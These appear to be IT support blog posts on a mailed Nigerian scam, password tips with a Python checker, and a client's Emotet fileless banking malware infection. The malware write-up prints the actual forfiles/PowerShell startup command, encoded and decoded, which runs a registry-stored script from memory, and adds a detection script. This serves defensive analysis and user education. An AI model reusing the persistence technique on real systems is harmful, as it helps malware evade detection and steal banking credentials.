Nigerian Scam

Scams come in many varieties. Usually, though, we are used to receiving Nigerian scams via email. I had a client this week drop in a letter she received in the mail. This is a reminder that scammers will change their tactics, and reuse old tactics, to try and keep ahead of the curve.

More information regarding Nigerian scams can be found on the Scam Watch website.

Password Tips

Many people have poor password habits. They use the same password everywhere, and often use obvious tricks to please the conditions required on various websites.

These obvious tricks are making the first letter uppercase, adding a number to the end of the password, or substituting an O with a 0, or an S with a $.

Here are some tips on what you should and should not do regarding passwords.

Your passwords should:

Contain as many characters as possible – longer is better, although some websites do have a limit: woah!thispasswordisreallylong is better than short1

Include uppercase and lowercase – mix it up a bit, not just the first letter: ITSnotTOOhardTOMIXTHECASES!! is better than Generic1

Include a number and/or symbol – again, mix it up a bit. Don't put the number or symbol only at the beginning or the end: ADDSOMEsymbols$$HERE&THERE is better than Symbol$

Include multiple words – multiple words are easier to remember than a string of random symbols, numbers, and letters: PASSphrasesarewhatyou#WANT244 is better than Password1

Your passwords should not:

Include any personal details – YourName1, 25StreetName, 026343####

Contain the name of a family member, friend, or pet – Father1950, Lucy90, Socks1

Contain the name of your town or farm – Grenfell2810, PropertyName2810

Make obvious substitutions, i.e. 0 instead of o, 1 instead of l, $ instead of s. Gr3nf311 is stronger than Grenfell, but cyber criminals know that we often replace letters with numbers and symbols that look the same.

Contain only a single word: single dictionary words are the worst password you could choose. A cyber criminal attempting to log into accounts is going to try the accounts with the simplest passwords first. If your password can be found in a dictionary, your account will get compromised first.

I hope these hints help you to create better and more secure passwords!
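As an added illustration (not part of the original post), here is a small Python checker that applies the do/don't tips above to a candidate password. The mini word list, the look-alike table and the 16-character minimum are assumptions for the demo; the caller supplies the personal details (names, pets, town) to check against.

```python
import string

# Constructed mini word list and look-alike map for the demo; a real checker
# would load a full dictionary plus the user's own names, pets, town, etc.
COMMON_WORDS = {"password", "generic", "symbol", "short", "socks", "lucy"}
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "$": "s", "@": "a", "5": "s"})
EDGE = string.digits + string.punctuation
MIN_LEN = 16  # assumed threshold; the post only says "longer is better"


def password_findings(password: str, personal=()) -> list:
    """Return the tips from the post that this password breaks (empty = none)."""
    out = []
    lower = password.lower()
    bare = lower.strip(EDGE)            # "Password1" -> "password"
    deleet = lower.translate(LEET)      # "Gr3nf311"  -> "grenfell"
    words = COMMON_WORDS | {p.lower() for p in personal}
    letters = [c for c in password if c.isalpha()]

    if len(password) < MIN_LEN:
        out.append("too short")
    if letters and (all(c.isupper() for c in letters) or all(c.islower() for c in letters)):
        out.append("single case")
    elif letters and letters[0].isupper() and all(c.islower() for c in letters[1:]):
        out.append("only the first letter is uppercase")
    # Numbers/symbols count only if at least one sits somewhere in the middle.
    core = password.strip(EDGE)
    if not any(c.isdigit() or c in string.punctuation for c in password):
        out.append("no number or symbol")
    elif not any(c.isdigit() or c in string.punctuation for c in core):
        out.append("number/symbol only at the beginning or end")
    if bare in words:
        out.append("single dictionary word")
    # A word that only appears once look-alikes are undone is a substitution.
    if any(w in deleet and w not in lower for w in words):
        out.append("obvious letter substitution")
    if any(p.lower() in deleet for p in personal):
        out.append("contains a personal detail")
    return out


if __name__ == "__main__":
    for pw in ("short1", "Password1", "Gr3nf311", "PASSphrasesarewhatyou#WANT244"):
        print(pw, "->", password_findings(pw, personal=("Grenfell",)) or "ok")
```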


For more password tips check out our other blog posts on Password Security and Creating Strong Passphrases using Diceware.

Analyzing File-less Banking Malware

This malware appears to have originated from an email claiming to be from the ASIC Messaging Service. It advises the user that their business name is due for renewal. The link within the email does not take the user to the ASIC website, but instead links to a website for a community newspaper. This website appears to have at some stage been compromised. A page had been added that automatically forwards the user to another malicious website. This is where malware was downloaded onto the client's PC.

For those who are interested in the more technical details, I won't link directly to the pages, but the Virus Total page for the original link can be found here. The link it redirects to is no longer available, but the Virus Total page can be viewed here. The second link has been marked by a member of the Virus Total community as ASIC phishing/malware.

I was investigating the malware infection for a client after the fact. At the time the client clicked the link (browser history verified the link was clicked), a JavaScript file appears to have been downloaded onto the machine. Virus Total and Hybrid Analysis links.

It is easy to blame the victim in these cases, but some phishing emails have become so well put together that anyone could fall for it.

After this, the client noticed that a command prompt window would flash up on the screen on Windows startup.

There was also a line at the bottom of the window, which I missed in the screenshot, that read:

ERROR: Access is denied for "C:\WINDOWS\System32\winevt\"

Around this time the client's bank contacted them to advise that their PC was infected with a banking trojan.

Removing File-less Banking Malware

I had no luck removing the malware with KVRT and had to proceed with a manual approach. ESET, my go-to AV, did not detect the malware, nor did Windows Defender.

KVRT showed the infection as:

MEM:Trojan-Banker.multi.Emotet.gen.

Upon inspecting the startup items, a command that utilizes a trusted Windows executable (forfiles) was set to run at each boot.

The command was:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAXABJAGQAZQBuAHQAaQB0AGkAZQBzAFwAewA0ADYANABBAEUARABGADUALQAwADUAQwA3AC0AQgA2ADYAMQAtADEANwAxADIALQBBADkANQA5ADcAOAAyADkAQgBFADQARAB9ACcAKQAuAFQA"

When the text is decoded the command is:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c "cmd /c @file -ec iex (gp 'HKCU:\\Identities\{464AEDF5-05C7-B661-1712-A9597829BE4D}').T"

Base64 text can be decoded using Certutil found in C:\WINDOWS\System32\

i.e. certutil.exe -decode encoded.txt decoded.txt

Base64 can also be decoded using an online service such as https://www.base64decode.org/.

Forfiles has been set to run at each startup. The /m p*ll.*e mask makes it find powershell.exe in System32 without the word "powershell" appearing in the startup entry, and the encoded command then has PowerShell read the script from the registry value and execute it (iex) straight from memory. This avoids writing the malware to disk and helps to prevent detection.
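To show how a startup entry like the one above can be picked apart and flagged automatically, here is an added Python example (not from the original post) that decodes the -ec payload and runs a few checks over both the launcher and the decoded script. The command and base64 blob are the ones quoted above; the indicator names, regexes and helper names are my own.

```python
import base64
import re

# Startup command as recorded in the post; only the variable names are mine.
ENCODED = "aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAXABJAGQAZQBuAHQAaQB0AGkAZQBzAFwAewA0ADYANABBAEUARABGADUALQAwADUAQwA3AC0AQgA2ADYAMQAtADEANwAxADIALQBBADkANQA5ADcAOAAyADkAQgBFADQARAB9ACcAKQAuAFQA"
STARTUP_CMD = (r'forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c "cmd /c @file -ec '
               + ENCODED + '"')

# -e / -ec / -enc / -encodedcommand followed by a base64 blob.
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Tells in the launcher itself: forfiles with a wildcard mask (p*ll.*e finds
# powershell.exe without the string "powershell" appearing in the entry).
LAUNCHER_TELLS = {
    "forfiles wildcard launch": re.compile(r"forfiles\b.*/m\s+\S*[*?]\S*", re.I),
    "encoded PowerShell command": ENC_FLAG,
}
# Tells in the decoded payload: run text fetched from a registry value.
PAYLOAD_TELLS = {
    "invoke-expression (iex)": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "script body read from registry": re.compile(r"\b(gp|get-itemproperty)\b.*\bHK(CU|LM):", re.I),
}


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 of UTF-16LE text, which is why a plain
    certutil -decode leaves a NUL byte after every character."""
    return base64.b64decode(b64).decode("utf-16-le")


def triage_startup_command(cmd: str) -> dict:
    """Return the decoded payload (if any) plus the names of the tells that fired."""
    hits = [name for name, rx in LAUNCHER_TELLS.items() if rx.search(cmd)]
    payload = None
    m = ENC_FLAG.search(cmd)
    if m:
        payload = decode_encoded_command(m.group(1))
        hits += [name for name, rx in PAYLOAD_TELLS.items() if rx.search(payload)]
    return {"payload": payload, "indicators": hits}


if __name__ == "__main__":
    result = triage_startup_command(STARTUP_CMD)
    print("decoded:", result["payload"])
    for name in result["indicators"]:
        print("  -", name)
```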

While I didn't analyse exactly what EMOTET was doing, banking malware is designed to steal login credentials. The password is captured when you log into your bank and is sent back to a server that the attacker controls. Banking malware often also takes screenshots so the attacker can capture other information such as funds available and account numbers.

Protecting yourself

Antivirus is not the magical safeguard it is often made out to be. It is still a great idea to have some kind of antivirus running on your device, but there are other tasks you can do to protect yourself or your business.

Train against phishing – It is simple for most home users: don't click links, and avoid attachments from people you don't know. For business users it is a little harder. Many staff members' jobs involve clicking links and opening attachments. This is why user training is important. Take a Phishing IQ Test.

Remove administrator privileges – I have covered this previously. Taking away administrator privileges can often limit what foothold malware can gain on your device.

Keep your software up to date – Some malware will exploit known vulnerabilities in your operating system or software. Windows users can install updates for the operating system via Windows Update (Windows Key + R, type control update, press Enter, and click Check for updates). Other software can be easily updated using Patch My PC.

Ask for help – If you receive an email that does not seem right, call a trusted friend or ask a colleague (if your business has in-house IT staff, start there). Sometimes talking it out loud will help you tell whether something is genuine or not.

Read our other articles and share them with your friends – I have covered many other tech tip topics. Read them and share them with your friends.
